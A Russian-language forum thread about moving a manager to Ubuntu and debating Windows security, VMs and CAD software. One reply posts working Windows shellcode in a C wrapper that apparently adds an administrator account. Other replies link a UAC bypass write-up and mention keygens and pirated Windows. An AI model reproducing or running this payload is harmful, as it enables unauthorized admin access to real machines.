Linux, маленькая история успеха

> умеют легко получать привилегии администратора, благо для того надо всего несколько строк написать

Каких строк? Я все понимаю, конечно, но столь смелые утверждения крайне желательно хоть чем-то подтверждать либо не делать вовсе

> Значит ты пожалел времени на настройку фаервола. Пожалел времени на разобраться в работе винды. Пожалел времени на безопасность своей домашней машины. Зато! через 2 месяца ты сел на убунту. Благо, соверменные дистрибутивы переставляются без проблем, да...

Предлагаешь ему, как и ты, сидеть на утащенной семёрке?

> Я под виртуалкой и оракловый сервер гонял, и ничего.

Я не знаю сколько рессурсов нужно оракловому серверу, но зато отлично знаю о прожорливости Солида (да вобщемто и другие КАДы типа Кати тоже не блещут низкими требованиями к железу)

без _СТОРОННЕГО_ антивируса. Вроде у мелкософта есть сейчас свой? У нас просто есть академическая лицензия, смогу достать почти всё лицензионное (только Ultimat-ы недоступны, АФАИК). Придётся мне всё-так сильно поступиться безопасностью, иначе эксперимент рискует затянутся надолго - оставлю на интерфейсе мелкософтовский протокол, службу сервера не выключу, да и фаервол не буду настраивать на защиту (а дополнительно откручу на беззащитность). А вот "пользоваться машиной" - это что имеется в виду? Шарахаться по интернету? Подкиньте уж куда сходить то? Почту вроде бы большинство известных операторов проверяет самостоятельно, неужели свой ставить? Я на винду и не осилю ведь :) А что ещё можно делать с машиной? Кей-ген какой-нибудь запустить, разве что...

оооо, от товарища модератора сложно скрыть юзерагентстринг :)

Win7RC - стыреная? Она до 1 июня 2010г нифига не стыреная, об этом можно было бы узнать даже никогда не заходя на сайт ненавистных мелкософтов. В общем - обидные вещи говоришь.

> Каких строк? Я все понимаю, конечно, но столь смелые утверждения крайне желательно хоть чем-то подтверждать либо не делать вовсе

на гугле забанили? см. какер.ру и т.п. сайты, там такого добра хватает

тс-с. Не нарушай стройную картину мира у человека. Вдруг психика не выдержит (:

шо, вот так быстро и слил с примером "нескольких строчек"? :О

>В общем, отложил я свои скромные дела и, предавшись порыву сознательности, ставлю ему убунту.

А ты его попробовал перед этим отговорить?

>> На машине будет winXP. Эксперимент буду проводить до обноружения на машине какого-либо прокси, релея, или клиента бот-сети. Как вам?

>отличный эксперимент, самому интересно) только, никаких NAT'ов, ок? ну и желательно машинкой более-менее пользоваться.. и без антивируса и сторонних фаеров/IDS ?

Если ей никто пользоваться не будет - фиг пробьеш.

>> Каких строк? Я все понимаю, конечно, но столь смелые утверждения крайне желательно хоть чем-то подтверждать либо не делать вовсе

>на гугле забанили? см. какер.ру и т.п. сайты, там такого добра хватает

Да ну?

люди, раз вы в теме - в 7-ке то хоть можно нормально NAT настроить? я в XP одно время пытался, чего только не ставил. но ради ната держать керио у меня рука не поднялась.

>и долго ли она проживет...

Минут 20.

> на гугле забанили? см. какер.ру и т.п. сайты, там такого добра хватает

Поконкретнее, пожалуйста. Если есть что сказать, конечно

я не в теме, у меня в хозяйстве только xp, висты и маленькое убунту:)

Я предупредил что ему будет непривычно. Но потом он сказал что на заре девяностых они на своем предприятии работали в никсах - я решил что попробовать стоит :)

20 минут - это вроде среднее время, необходимое для отлова какой-либо атаки. Что проживёт 20 минут - это уже спорное утверждение.

> шо, вот так быстро и слил с примером "нескольких строчек"? :О

тебе стало легче?

char code[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"
"\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"
"\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"
"\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"
"\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"
"\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"
"\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"
"\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"
"\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"
"\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"
"\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"
"\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"
"\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"
"\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"
"\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"
"\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"
"\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";


int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) code;
(int)(*funct)();
}

еще раз - даже на попсовых сайтах куча примеров, например, http://www.securitylab.ru/search/index.php?q=exploit+local+windows&where=

вроде в 5-6 годах был довольно шустрым. И его уже тормознули?

> вроде в 5-6 годах был довольно шустрым. И его уже тормознули?

Тенденция такова что чем свежее версия тем больше фич (кстати фич весьма полезных а не для галочки) и тем больше требования к железу :(

Молодчага, олько виртуалку не ставь, а ставь вайн. имхо удобнее

>Конечно легче - ведь интернет и почта уже не будут источником угрозы

Если, конечно, обучишь начальника пользоваться noscript

>Смейтесь дальше, но так и есть

В принципе, если сидеть за маршрутизатором, посещать только ограниченное число веб-сайтов (а не лазить по варезникам и порнофорумам), использовать только лицензионное ПО, которое необходимо - то да.

>От антивирусов больше вреда чем пользы

Так было девять лет назад, когда онлайн проверка отнимала много ресурсов

тут предстоят эксперименты. начальный посыл был "хотим виртуалку". еще будет период болезненного привыкания. зато в конце получим какое-то готовое решение а-ля "для начальников отдела".

> Значит в виртуалке будет какой-нибуть CAD? :) Думаю что очень скоро тебя попросят вернуть всё взад, ибо софт это слишком рессурсоёмкий.

Скорее всего, там что-нибудь самописное. И намертво привязанное к какой-нибудь Windows 2000. То есть под Windows 7 виртуалка всё равно желательна :)

> Вирусосборки под названием "коллекции инсталлов" меня вымораживали всегда.

Что это такое?

Это те горы инсталлях, которые виндовые пользователи таскают на винчестерах и хранят в сети на файлопомойках.

зы. ты издеваешься или серьезно кроме пакетных менеджеров ничего не застал о_О ?

Я просто не встречал применительно к ним слово "коллекция".

>системы управления для шагающих экскаваторов

мои герои!

> Значит в виртуалке будет какой-нибуть CAD? :) Думаю что очень скоро тебя попросят вернуть всё взад, ибо софт это слишком рессурсоёмкий.

VBox умеет паравиртуализацию (по крайней мере, пилят неслабо).

>> В какой из многочисленных виртуалок?

> В виртуалбоксе.

Тут вопрос, с аппаратной виртуализацией или без, и с паравиртуальными драйверами или с родными на эмулируемом железе.

Как обычно, спалилась огромная куча народу.

Не знаю как CAD будет пахать через цитрикс, да и затратен такой подход... Но и он имеет опеределенные плюсы.

>> умеют легко получать привилегии администратора, благо для того надо всего несколько строк написать

> Каких строк? Я все понимаю, конечно, но столь смелые утверждения крайне желательно хоть чем-то подтверждать либо не делать вовсе

Что-нибудь вроде такого?

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

Проблема в установках по умолчанию.

Кроме того, существуют программы, которых без прав администратора работают с трудом - то в какой-нибудь ветке реестра норовят нагадить, то в свою рабочую директорию что-нибудь записать и так далее.

А еще постоянно включенный RPC и куча других сетевых сервисов, тоже установленных по умолчанию. И попробуй что-нибудь из сервисов отключи - где-нибудь обязательно аукнется. И никто не знает точного списка программ, использующих эти сервисы.

>В принципе, если сидеть за маршрутизатором, посещать только ограниченное число веб-сайтов (а не лазить по варезникам и порнофорумам)

Сейчас до заражённых варезников или порносайтов, порой, достаточно 1-2 клика с весьма уважаемых и популярных сайтов :) Увидел рекламный баннер интересный, кликнул, открыл другой сайт, а на нём уже - прямая реклама той же порнухи...

отписываюсь по сабжу. посмотрели, пока нравится. досовский пикад запускать слишком неудобно - досему хоть и делает что положено, но с осью не интергируется никак. всерьез думаю о том чтобы впаять 95-ю или 98 в виртуалку специально для него.
в целом же получается достаточно громоздкое решение, что не есть гуд.